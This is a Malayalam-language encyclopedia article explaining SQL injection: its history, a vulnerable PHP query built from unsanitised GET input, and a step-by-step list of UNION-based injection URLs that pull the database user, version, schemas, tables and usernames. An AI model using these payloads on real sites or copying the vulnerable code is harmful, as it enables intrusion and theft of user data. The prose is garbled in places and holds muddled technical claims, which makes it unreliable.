എസ്.ക്യു.എൽ. ഇഞ്ചക്ഷൻ

വിക്കിപീഡിയ, ഒരു സ്വതന്ത്ര വിജ്ഞാനകോശം.
 വിക്കിപീഡിയയുടെ ഗുണനിലവാരത്തിലും, മാനദണ്ഡത്തിലും എത്തിച്ചേരാൻ ഈ ലേഖനം വൃത്തിയാക്കി എടുക്കേണ്ടതുണ്ട്‌.
ഈ ലേഖനത്തെക്കുറിച്ച് കൂടുതൽ വിശദീകരണങ്ങൾ നൽകാനാഗ്രഹിക്കുന്നെങ്കിൽ ദയവായി സംവാദം താൾ കാണുക.

വെബ്‌ ആപ്ലിക്കേഷൻ സോഫ്റ്റ്‌വെയർ പ്രോഗ്രാമായ MysQL,php എന്നീ സ്ക്രിപ്റ്റുകൾ കൊണ്ടു നിർമിച്ചതാണ് സൈബർ ലോകത്തെ 78% വെബ്സൈറ്റുകളും. ഈ സ്ക്രിപ്റ്റുകൾ വെബ്സൈറ്റുകളുടെ ആന്തരിക പ്രവർത്തനത്തിനു [it can lead to exposure of all of the sensitive information stored in an application’s database, including handy information such as usernames, passwords, names, addresses, phone numbers, and credit card details.] ഒഴിച്ചുകുടാനാവാത്തതും വളരെ വിലപ്പെട്ട വിവരങ്ങൾ സൂക്ഷിക്കുന്നതുകൊണ്ടും [അഡ്മിൻ പാസ്സ്‌വേർഡ്‌] ഹാക്കർമാർ ഹാക്ക്‌ ചെയ്യാൻ വേണ്ടി SQL INJECTIONനെ ആശ്രയിക്കുന്നതും, അത്തരം ഹാക്കിംഗ് നെ കുറിച്ച് പഠിക്കുന്നതും. 1998, റൈൻ ഫോറസ്റ്റ്‌ പപ്പി[Rain Forest Puppy] "NT Web Technology Vulnerabilities” എന്ന ഹാക്കർ (“How I hacked PacketStorm,” located at www. wiretrip.net/rfp/txt/rfp2k01.txt) പാക്കറ്റ്‌സ്റ്റോം എന്ന വെബ്സൈറ്റ് എങ്ങനെയാണ് ഹാക്ക്‌ ചെയ്യുക. എന്ന് പബ്ലിഷ് ചെയ്യുകയുണ്ടായി. എന്നാൽ അന്നതു ആരും കാര്യമാക്കി എടുത്തില്ല എന്നാൽ 2000തോടു കൂടി സെക്യൂരിറ്റി റിസർച്ചർമാർ Sql ദുരുപയോഗംചെയ്യാൻ തുടങ്ങി. പലരും അത് സ്വന്തം ഉയർച്ചക്ക് വേണ്ടി സ്വന്തം ബ്ലോഗുകളിൽ പബ്ലിഷ് ചെയ്തു. മറ്റു ചിലർ ഇവ ദുരുപയോഗം ചെയ്തു അങ്ങനെ സൈബർലോകത്തെ ഹാക്കർമാരുടെ ഇന്നും പ്രിയപ്പെട്ട വാക്കായിമാറി SQL injection. എങ്ങനെയാണ് വെബ്‌ ആപ്ലിക്കേഷൻ പ്രവർത്തിക്കുന്നത് വെബ്സൈറ്റുകളുടെ പ്രവർത്തനം എളുപ്പമാകാനും ദിവസവുമുള്ള ഉപയോക്താവിനെ എങ്ങനെ തങ്ങളുടെ വെബ്സൈറ്റ്ലേക്ക് ആകർഷിക്കാൻവേണ്ടിയും അവരുടെ സ്വകാര്യ വിവരങ്ങൾ സൂക്ഷിക്കാനും വേണ്ടിയാണ്, വെബ്‌ ആപ്ലിക്കേഷൻസ് പ്രവർത്തിക്കുന്നത് 3 തരത്തിലാണ് ഒരു ഡാറ്റാ ബേസ് അതിന്റെ വെബ്‌ ആപ്ലിക്കേഷന്റെ പ്രവർത്തനത്തെ ബാധിക്കുന്നത്.

  • ഒരു വെബ്സൈറ്റിലെ ഒരു ഉത്‌പന്നങ്ങത്തെ കുറിച്ച് അറിയാനുള്ളതും അതുപോലെതന്നെ അതിൻറെ വിലയെ തരംതിരിക്കുന്ന ഒരു ലിങ്ക് ആണ് ഇത്
http://www.victim.com/products.php?val=100
// connect to the database
$conn = mysql_connect("localhost","username","password");
// dynamically build the sql statement with the input
$query = "SELECT * FROM Products WHERE Price < '$_GET["val"]' " .
"ORDER BY ProductDescription";
// execute the query against the database
$result = mysql_query($query);
// iterate through the record set 
while($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
// display the results to the browser
echo "Description : {$row['ProductDescription']} 
" .
"Product ID : {$row['ProductID']} 
" .
"Price : {$row['Price']} 

";
}
  • താഴെയുള്ള പി.ഏച്ച്.പി കോഡ് ആ വെബ്‌ സെർവർറിൽ നിന്നും റിസൾട്ട്‌ കണ്ടു പിടികുന്നത്
SELECT *
FROM Products
WHERE Price < '100.00'
ORDER BY ProductDescription;
  • അവസാനം നമ്മൾ എന്തു ചോദിച്ചുവോ അത് നമ്മുടെ ബ്രൌസർ കാണിച്ചു തരുന്നു

ഇതാണ് സിമ്പിൾ പി.ഏച്ച്.പി രൂപം.... അതിൽ തന്നെ ചുവന്ന സ്ക്രിപ്റ്റ്‌കൾ കണ്ടില്ലേ [ $conn = mysql_connect("localhost","username","password"); ] http://www.victim.com/products.php?val=100 എന്ന വെബ്സൈറ്റിന്റെ

  • localhost ഡാറ്റാ ബേസ്
  • username യുസർ നെയിം
  • password പാസ്സ്‌വേർഡ്‌

ഇത്രയും മതി ഒരു ഹാക്കർനു ആ വെബ്സൈറ്റ് ടേക്ക് ഡൌൺ ചെയ്യാൻ ഇവ എങ്ങനെയാണ് ഒരു ഹാക്കർ എക്സ്പ്ലോഇറ്റ്‌ ചെയ്യുന്നത് എന്ന് നോക്കാം രണ്ട്‌ തരത്തിലാണ് നടക്കുന്നത്

1. Normal SQL Injections 2. Blind SQL Injections

[തിരുത്തുക] Normal SQL Injections

ലോക്കൽ വെബ്സൈറ്റ്‌കൾ ഹാക്ക്‌ ചെയ്യാൻ ഇത്തരം SQL Injections ഉപയോഗിക്കുന്നത്. സാധരണ ഹാക്കർമാർപോല്ലും ഇത്തരം SQL Injections ആശ്രയിക്കുന്നുണ്ട് കോഡിംഗ്ഈൽ താല്പര്യമുള്ളവർക്കും എളുപ്പം മനസിലാകാൻ സാധികുന്നതുമാണ്. എന്നാൽ ഇത്തരം SQL Injections ചെയ്യുമ്പോൾ ഹാക്കർമാരുടെ ബ്രൌസർ നെയിം, ഐ പി അഡ്രെസ്സ്,ടൈം എന്നിവയെല്ലാം നശിപ്പിക്കാൻ ഉദ്ദേശിച്ച വെബ്സൈറ്റ് ഒരു ലോഗ് ഫയൽ ആയി സൂക്ഷിക്കുന്നുണ്ട് എന്നതു ചില ഹാക്കർമാർക്ക്‌ മാത്രമേ അറിയൂ.

http://www.target.com/news/newsdesc.php?id=2 http://www.target.com/news/newsdesc.php?id=2' http://www.target.com/news/newsdesc.php?id=2 and 1=0 union select 1,2,3,4,5,6-- http://www.target.com/news/newsdesc.php?id=2 and 1=0 union select 1,user(),3,4,5,6-- http://www.target.com/news/newsdesc.php?id=2 and 1=0 union select 1,database(),3,4,5,6-- http://www.target.com/news/newsdesc.php?id=2 and 1=0 union select 1,version(),3,4,5,6-- http://www.target.com/news/newsdesc.php?id=2 and 1=0 union select 1,SCHEMA_NAME,3,4,5,6 FROM INFORMATION_SCHEMA.SCHEMATA http://www.target.com/news/newsdesc.php?id=2 and 1=0 union select 1,concat(TABLE_NAME,0x3a,TABLE_SCHEMA),3,4,5,6 FROM INFORMATION_SCHEMA.TABLES http://www.target.com/news/newsdesc.php?id=2 and 1=0 union select 1,concat(TABLE_NAME,0x3a,TABLE_SCHEMA),3,4,5,6 FROM INFORMATION_SCHEMA.TABLES http://www.target.com/news/newsdesc.php?id=2 and 1=0 union select 1,concat(username),3,4,5,6 FROM users --

[തിരുത്തുക] Blind SQL Injections

വിവരമുള്ള ഹാക്കർമാർക്ക് പറഞ്ഞിട്ടുള്ള പണിയാ ഇത്.

SQL Injections  കുറിച്ച് ആഴത്തിൽ പഠിച്ചവർക്ക് മാത്രമേ ഇത്തരം ഹാക്ക്‌ ചെയ്യാൻ സാധിക്കുകയുള്ളൂ.  സെകുർ[https] വെബ്സൈറ്റ്കൾ ഹാക്ക്‌ ചെയ്യാൻ വേണ്ടി Blind SQL Injections  ഉപയോഗിക്കുന്നു.
"http://ml.wikipedia.org/w/index.php?title=എസ്.ക്യു.എൽ._ഇഞ്ചക്ഷൻ&oldid=1307327" എന്ന താളിൽനിന്നു ശേഖരിച്ചത്
സ്വകാര്യതാളുകൾ
നാമമേഖല

ചരങ്ങൾ
നടപടികൾ
ഉള്ളടക്കം
പങ്കാളിത്തം
വഴികാട്ടി
ആശയവിനിമയം
പണിസഞ്ചി
ഇതരഭാഷകളിൽ